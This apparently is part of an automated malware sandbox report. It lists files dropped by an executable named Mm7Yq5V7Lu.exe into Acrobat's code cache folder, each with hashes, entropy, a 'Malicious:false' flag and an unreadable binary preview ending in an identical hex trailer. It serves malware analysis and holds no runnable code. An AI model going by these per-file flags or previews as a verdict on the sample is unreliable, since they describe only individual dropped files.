                                                                                                                                                      Preview: .\z.V..?...._...u...^.....fM..O%.Bcg..<Ba.......4..u..'u.K...c....eD.....du.G.. .A.....eh...%.U..`.3.r.!..+D3....I6.)V.e3G.D.....dQ.....T.S...>.'.......RDb.d..Q.aA.Hx,...A....G...|h..u....n.?A....z{4(g.Q....Z..id.6.B.X..-...h...v~..Xa@.AFp0..f..G_.q.....3'.f`...F@.dX.Zy..E. .......0.0.D.>.O.0.:g......D..z...([.'...wAF.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.6615073076054765
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ock90jSOwIXwdKcfmzK8sevWAVgKTaCB7RZ0cHYIgtyUzyZ:nDj6BbmzCwgck38nZ
                                                                                                                                                      MD5:C00D23D1DA180A869F8DBB7A737E780F
                                                                                                                                                      SHA1:E8441575CD8B10C6609AB9E57F1544D9B066EE6B
                                                                                                                                                      SHA-256:3C8714AF26DBA9E58988EADA7AF53020C88C003C08E6E1BA809BD95A9F9A09CB
                                                                                                                                                      SHA-512:18A65828DB023F0E639CC97D05393E12A18CCB8F8467044BEA98C1717E07D234125EA56CB5EA1DDDF6DFEC1E6D797F90B4E9A469C5A0D4204439CB47B5A19A42
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .\z.V..?...._...u...^.....fM..O%.Bcg..<Ba.......4..u..'u.K...c....eD.....du.G.. .A.....eh...%.U..`.3.r.!..+D3....I6.)V.e3G.D.....dQ.....T.S...>.'.......RDb.d..Q.aA.Hx,...A....G...|h..u....n.?A....z{4(g.Q....Z..id.6.B.X..-...h...v~..Xa@.AFp0..f..G_.q.....3'.f`...F@.dX.Zy..E. .......0.0.D.>.O.0.:g......D..z...([.'...wAF.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.780917485931403
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:sRgY47ultqY/FzK8sevWAVgKTaCB7RZ0cHYIgtyUzxv33:sRU4FzCwgck38ev33
                                                                                                                                                      MD5:6F0C218D4D53B4F7E2A5330070A2C815
                                                                                                                                                      SHA1:D21D9E29B1FA4705A13CBB773A704B8E43204BA2
                                                                                                                                                      SHA-256:FAFA3BFD3FE6244056FFDD2B31FCF75947A7F4FE439F7DA75EEF9AF49D861680
                                                                                                                                                      SHA-512:3246E87834B2E94DE901C5553F545B28ED9DCA019D5A75973FC9CDEA533BE230CB0201694BE28742DAFE32642A7FC9876AFA0278DC63B53927D2D17FBA523B0C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .n.W/w..i...&:i...=l........F...2..K.9u....M.UA.sxf"...&j..G....O.`Rn...C.p].f.e.e..p..l..E.-mz.@.qK>^o9......2.....:I.[o....=.1b...Y..RL.Ez..].9...2d@}......<r.J....;...m.lc.YO.A..wW.m...{..+9..I.....=..}.n......{.^.3..O.B.Jd.Z.'..?..".. ....8.c".j>.E._.....UF$@^..sd..~.(i.....a....L...m`.]......<gkRy.?/...H.l..%..3.q...4..i@.$..d;...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.780917485931403
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:sRgY47ultqY/FzK8sevWAVgKTaCB7RZ0cHYIgtyUzxv33:sRU4FzCwgck38ev33
                                                                                                                                                      MD5:6F0C218D4D53B4F7E2A5330070A2C815
                                                                                                                                                      SHA1:D21D9E29B1FA4705A13CBB773A704B8E43204BA2
                                                                                                                                                      SHA-256:FAFA3BFD3FE6244056FFDD2B31FCF75947A7F4FE439F7DA75EEF9AF49D861680
                                                                                                                                                      SHA-512:3246E87834B2E94DE901C5553F545B28ED9DCA019D5A75973FC9CDEA533BE230CB0201694BE28742DAFE32642A7FC9876AFA0278DC63B53927D2D17FBA523B0C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .n.W/w..i...&:i...=l........F...2..K.9u....M.UA.sxf"...&j..G....O.`Rn...C.p].f.e.e..p..l..E.-mz.@.qK>^o9......2.....:I.[o....=.1b...Y..RL.Ez..].9...2d@}......<r.J....;...m.lc.YO.A..wW.m...{..+9..I.....=..}.n......{.^.3..O.B.Jd.Z.'..?..".. ....8.c".j>.E._.....UF$@^..sd..~.(i.....a....L...m`.]......<gkRy.?/...H.l..%..3.q...4..i@.$..d;...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.710672835156506
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Q9u+VH9olyAKDK+82Dt3zK8sevWAVgKTaCB7RZ0cHYIgtyUz+rirk:Q9uqdokAKA2Dt3zCwgck382k
                                                                                                                                                      MD5:3950739ED97B653AEBBEF3D8E7535329
                                                                                                                                                      SHA1:CD28F38B8D4B409972FFA117CF1AC95B1A26111C
                                                                                                                                                      SHA-256:8FDA9CC6DF11BE6B1B0647E0A9D64119D1B584173F8B87BC7E294379D15973F1
                                                                                                                                                      SHA-512:A27DC5F0384FD4DD66AB01AC420985D3244A0E418F95365F170E0AEA6821A45311B619E6875C956F6D6D1F931B92443014B10C6B5E0A9265408FECF05B4F0045
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: _j.6q....ep&.[#x4...&x......sz..x..5K7.}.D9.HHc|c..".a.....h..N.....G.7..P...RY...xp.P.?.W.\a.K0......f...~j..&>m.,.q.'..*.......j!D.S.Z>$'.HC..U...w..P...8~j.. ....\:s...Z..\....n...V5h=...\.#L.8W.>H4.A#Bo0>E..p[v.x.*1N=q..T.:..RV...z]..n4.i...M.(1..C....?..lR....(<C..NNn.D>.V..B...`.V.O.......%..6$.+o.g(...h.......,!..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.710672835156506
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Q9u+VH9olyAKDK+82Dt3zK8sevWAVgKTaCB7RZ0cHYIgtyUz+rirk:Q9uqdokAKA2Dt3zCwgck382k
                                                                                                                                                      MD5:3950739ED97B653AEBBEF3D8E7535329
                                                                                                                                                      SHA1:CD28F38B8D4B409972FFA117CF1AC95B1A26111C
                                                                                                                                                      SHA-256:8FDA9CC6DF11BE6B1B0647E0A9D64119D1B584173F8B87BC7E294379D15973F1
                                                                                                                                                      SHA-512:A27DC5F0384FD4DD66AB01AC420985D3244A0E418F95365F170E0AEA6821A45311B619E6875C956F6D6D1F931B92443014B10C6B5E0A9265408FECF05B4F0045
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: _j.6q....ep&.[#x4...&x......sz..x..5K7.}.D9.HHc|c..".a.....h..N.....G.7..P...RY...xp.P.?.W.\a.K0......f...~j..&>m.,.q.'..*.......j!D.S.Z>$'.HC..U...w..P...8~j.. ....\:s...Z..\....n...V5h=...\.#L.8W.>H4.A#Bo0>E..p[v.x.*1N=q..T.:..RV...z]..n4.i...M.(1..C....?..lR....(<C..NNn.D>.V..B...`.V.O.......%..6$.+o.g(...h.......,!..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.763780728389542
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OTu4e9hDqDHC8zK8sevWAVgKTaCB7RZ0cHYIgtyUz7:Ok9hDqDHC8zCwgck38C
                                                                                                                                                      MD5:482DC74489BE4299A1D1F400459EC708
                                                                                                                                                      SHA1:C5812481922F187F2DF6EDA8DB02D9F395680569
                                                                                                                                                      SHA-256:9EC7E10D7217C2BBD8FBD789B26A2F49510EFD8D4173131530EBDDA9329F2E85
                                                                                                                                                      SHA-512:2F2EC74F0508BDDECEC54B6CA4C2138286A7554F3D822C5432936CDF53ACDEF118856281AA9D702F3249DF82AE5A442E2030370BD8D5B2E8E5736C1100C47FAA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .YU......^a.9...[D..Pdn-..8.....F...XM.p..(4.FR.gD]^...v.d$s...G.^.I..%.7A.iya/x.9.P4..SAe..\...G....5C..T.n.7ixLEs....4'...... .....+.@\.#].K....\%....^.......z.OE......H. ...}...'.+.],.jk\t.<.....,..&..dL.....;......;c1:......i....F.$.....1..%.........(.'.r..u..i..P.5@...X..........u|!.{....U.rG...G.nT.}7*....Y....e..~.T./.HGGf..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.763780728389542
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OTu4e9hDqDHC8zK8sevWAVgKTaCB7RZ0cHYIgtyUz7:Ok9hDqDHC8zCwgck38C
                                                                                                                                                      MD5:482DC74489BE4299A1D1F400459EC708
                                                                                                                                                      SHA1:C5812481922F187F2DF6EDA8DB02D9F395680569
                                                                                                                                                      SHA-256:9EC7E10D7217C2BBD8FBD789B26A2F49510EFD8D4173131530EBDDA9329F2E85
                                                                                                                                                      SHA-512:2F2EC74F0508BDDECEC54B6CA4C2138286A7554F3D822C5432936CDF53ACDEF118856281AA9D702F3249DF82AE5A442E2030370BD8D5B2E8E5736C1100C47FAA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .YU......^a.9...[D..Pdn-..8.....F...XM.p..(4.FR.gD]^...v.d$s...G.^.I..%.7A.iya/x.9.P4..SAe..\...G....5C..T.n.7ixLEs....4'...... .....+.@\.#].K....\%....^.......z.OE......H. ...}...'.+.],.jk\t.<.....,..&..dL.....;......;c1:......i....F.$.....1..%.........(.'.r..u..i..P.5@...X..........u|!.{....U.rG...G.nT.}7*....Y....e..~.T./.HGGf..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1184
                                                                                                                                                      Entropy (8bit):5.816852225468848
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:RYG2Xjk+eCX5pO2e+zK8sevWAVgKTaCB7RZ0cHYIgtyUzwF3:4z/5VzzCwgck38d3
                                                                                                                                                      MD5:1E8F6BC8F5B8BC0286EC12224DDA7C9D
                                                                                                                                                      SHA1:AAC026C5CD9BD3ACD52007B958AA0345E0098ADC
                                                                                                                                                      SHA-256:F040C38A2B708A952DBD0AF5CBAB7BF21D8C487E7E3E531CB3B2608EA95C92FC
                                                                                                                                                      SHA-512:A8F7013B24FEE1DC5D9E090FB3A1FCF602228F33B0EAE20D604C71028C867FBBD9AAE9F01428919F2C59F7424C66E6D0262D09E69C68FACBA1183895F60C1F08
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .X....X!..IU..q...l^<.._....`.....3.......v.[eU((. l......A:..m.{........,s....I.e^&.08x......)...<rt.S..c.+.e...9.s...Re...b..../.T#..Q.n...t...>;{.r..,...N..^eS.1.m..7.m....F.8......!Z.}34n5....P.K.|.)..a.U]...-h.c..Ty&8r=...|........P.-.q.n.R.jIs....n}..9.ph_-..j.3@.f.X..\..........P....+*.[..%Ze............W{.I..|T...FW..7...A.Mm.rb..8.....pJ...iFB67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1184
                                                                                                                                                      Entropy (8bit):5.816852225468848
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:RYG2Xjk+eCX5pO2e+zK8sevWAVgKTaCB7RZ0cHYIgtyUzwF3:4z/5VzzCwgck38d3
                                                                                                                                                      MD5:1E8F6BC8F5B8BC0286EC12224DDA7C9D
                                                                                                                                                      SHA1:AAC026C5CD9BD3ACD52007B958AA0345E0098ADC
                                                                                                                                                      SHA-256:F040C38A2B708A952DBD0AF5CBAB7BF21D8C487E7E3E531CB3B2608EA95C92FC
                                                                                                                                                      SHA-512:A8F7013B24FEE1DC5D9E090FB3A1FCF602228F33B0EAE20D604C71028C867FBBD9AAE9F01428919F2C59F7424C66E6D0262D09E69C68FACBA1183895F60C1F08
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .X....X!..IU..q...l^<.._....`.....3.......v.[eU((. l......A:..m.{........,s....I.e^&.08x......)...<rt.S..c.+.e...9.s...Re...b..../.T#..Q.n...t...>;{.r..,...N..^eS.1.m..7.m....F.8......!Z.}34n5....P.K.|.)..a.U]...-h.c..Ty&8r=...|........P.-.q.n.R.jIs....n}..9.ph_-..j.3@.f.X..\..........P....+*.[..%Ze............W{.I..|T...FW..7...A.Mm.rb..8.....pJ...iFB67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.647872915638825
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8Oen48heuh+k84hcfwMnztzK8sevWAVgKTaCB7RZ0cHYIgtyUzT+O0v:8Owa/9fwMztzCwgck388j0v
                                                                                                                                                      MD5:9BA5A10DD953ECE36D2C8F3D28FEE41F
                                                                                                                                                      SHA1:A329E8CA8974EE2304E4FFAE3F608F26631B0FB7
                                                                                                                                                      SHA-256:E64629CCCB2A2555681A05B50000D9A727F7A8E757C11BE1B6A330EFCD0D5343
                                                                                                                                                      SHA-512:6A8F134B5976D346FF56368933432AFD451BD124045E0EC39D742E25FCA636BB7FC1CC4E9F1076B588CFA1D71FDAC85B354F78199868C60BA2DF9522142FACB1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: y......b..+....$(L...E.`8..<.t...s..qq8i.]]..z.WJn...T.qk8f.v;.....j..!O.`......,g0.l.#...".5...........C5.u..I.D-...l.......8`.Z...9..z.t.j..7....N8 ...t..CS.<.{.....1..r)....U.=.Gd....1.4....rlq?..........Bf..`n..XBgU.c.{...;....B.+k{..&.n.j...F....+...".x.b.q..IXI$....(.6.x..@...- V.j29..3f.`.L...p.q67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.647872915638825
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8Oen48heuh+k84hcfwMnztzK8sevWAVgKTaCB7RZ0cHYIgtyUzT+O0v:8Owa/9fwMztzCwgck388j0v
                                                                                                                                                      MD5:9BA5A10DD953ECE36D2C8F3D28FEE41F
                                                                                                                                                      SHA1:A329E8CA8974EE2304E4FFAE3F608F26631B0FB7
                                                                                                                                                      SHA-256:E64629CCCB2A2555681A05B50000D9A727F7A8E757C11BE1B6A330EFCD0D5343
                                                                                                                                                      SHA-512:6A8F134B5976D346FF56368933432AFD451BD124045E0EC39D742E25FCA636BB7FC1CC4E9F1076B588CFA1D71FDAC85B354F78199868C60BA2DF9522142FACB1
                                                                                                                                                      Malicious:false
